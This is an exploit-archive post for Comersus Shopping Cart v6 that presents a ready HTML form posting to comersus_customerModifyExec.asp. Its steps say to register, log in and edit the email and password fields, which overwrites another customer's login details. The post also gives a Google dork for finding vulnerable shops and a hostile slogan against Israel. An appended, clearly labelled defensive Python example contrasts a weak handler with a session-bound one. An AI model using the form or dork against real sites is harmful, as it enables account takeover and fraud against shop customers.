Comersus Shopping Cart <= v6 Remote User Pass Exploit
Source: www.vfcocus.net  Author: ajann  Published: 2009-01-13
*******************************************************************************
# Title   :  Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author  :  "ajann" from Turkey
# Contact :   :(
# S.Page  :  http://www.comersus.com/
# $$      :  Free
# Dork    :  Powered by Comersus v6 Shopping Cart
# DorkEx  :

http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=

KAHROLSUN ISRAEL

-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form

*******************************************************************************

<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
  <table width="421" border="0"> 
      <tr>
     
    </tr>
    <tr>
      <td width="168">Name</td>
      <td width="220">     
        <input type=text name=customerName value="test">
      </td>
    </tr>   
    <tr>
      <td width="168">Last Name</td>
      <td width="220">     
        <input type=text name=lastName value="test">
      </td>
    </tr>
    <tr>
      <td width="168">Company</td>
      <td width="220">     
        <input type=text name=customerCompany value="test">
      </td>
    </tr>
    <tr>
      <td width="168">Phone</td>
      <td width="220">       
       <input type=text name=phone value="123456789">
      </td>
    </tr>
    <tr>
      <td width="168"><strong>Email</strong></td>
      <td width="220">  
   
        <input type="text" name="email" value="Please Add Mail">
        Edit
      </td>
    </tr>
    <tr>
      <td width="168"><strong>Password</strong></td>
      <td width="220">        
        <input type=text name=password value="Please Add Pass">
        Edit
      </td>
    </tr>
    <tr>
      <td width="168">Address</td>
      <td width="220">        
        <input type=text name=address value="test">
      </td>
    </tr>
    <tr>
      <td width="168">Zip</td>
      <td width="220">        
        <input type=text name=zip value="08050">
      </td>
    </tr>
    <tr>
      <td width="168">State</td>
      <td width="220">        
       
      <SELECT name=stateCode size=1>
      <OPTION value="">Select the state
        <option value="1">Please Type County below
      </OPTION>
      </SELECT>
      </td>
    </tr>
    <tr>
      <td width="168">Non listed state</td>
      <td width="220">        
       <input type=text name=state value="">
      </td>
    </tr>
    <tr>
      <td width="168">City</td>
      <td width="220">        
        <input type=text name=city value="test">
      </td>
    </tr>   
    <tr>
      <td width="168">Country</td>
      <td width="220">                
       
      <SELECT name=countryCode>
      <OPTION value="">Select the country
        <option value="AF" selected>AFGHANISTAN
      </OPTION>
      </SELECT>      
      </td>
    </tr>
   
   
   
    <tr>
      <td width="168">&nbsp;</td>
      <td width="220">&nbsp;</td>
    </tr>
    <tr>
      <td colspan="2">       
          <input type="submit" name="Modify" value="Modify">                           
      </td>
    </tr>
    </table>
   </form>         
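
Added defensive example (not part of the original advisory and not Comersus code): a weak account-modify handler beside a hardened one that binds the update to the logged-in session and re-checks the current password. It assumes, since the page does not show the server side, that the handler selects the customer row from the posted `email` field; the table layout, `make_db`, and all function names are hypothetical.

```python
import hashlib, hmac, os, sqlite3

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed sample data: two customers in an in-memory table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY,"
               " email TEXT UNIQUE, salt BLOB, pw BLOB)")
    for cid, email, pw in [(1, "alice@example.test", "alice-pw"),
                           (2, "bob@example.test", "bob-pw")]:
        salt = os.urandom(16)
        db.execute("INSERT INTO customers VALUES (?,?,?,?)",
                   (cid, email, salt, _hash(pw, salt)))
    return db

def check_password(db, email, password):
    row = db.execute("SELECT salt, pw FROM customers WHERE email=?",
                     (email,)).fetchone()
    return row is not None and hmac.compare_digest(row[1], _hash(password, row[0]))

def modify_weak(db, session, form):
    """ASSUMED flaw: the row to update is picked by the posted email field."""
    salt = os.urandom(16)
    cur = db.execute("UPDATE customers SET salt=?, pw=? WHERE email=?",
                     (salt, _hash(form["password"], salt), form["email"]))
    return cur.rowcount == 1

def modify_hardened(db, session, form):
    """Row comes from the server-side session; current password is re-checked."""
    cid = session["customer_id"]
    row = db.execute("SELECT email FROM customers WHERE id=?", (cid,)).fetchone()
    if row is None or not check_password(db, row[0], form.get("current_password", "")):
        return False
    salt = os.urandom(16)
    try:
        db.execute("UPDATE customers SET email=?, salt=?, pw=? WHERE id=?",
                   (form["email"], salt, _hash(form["password"], salt), cid))
    except sqlite3.IntegrityError:  # posted email belongs to another account
        return False
    return True
```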
 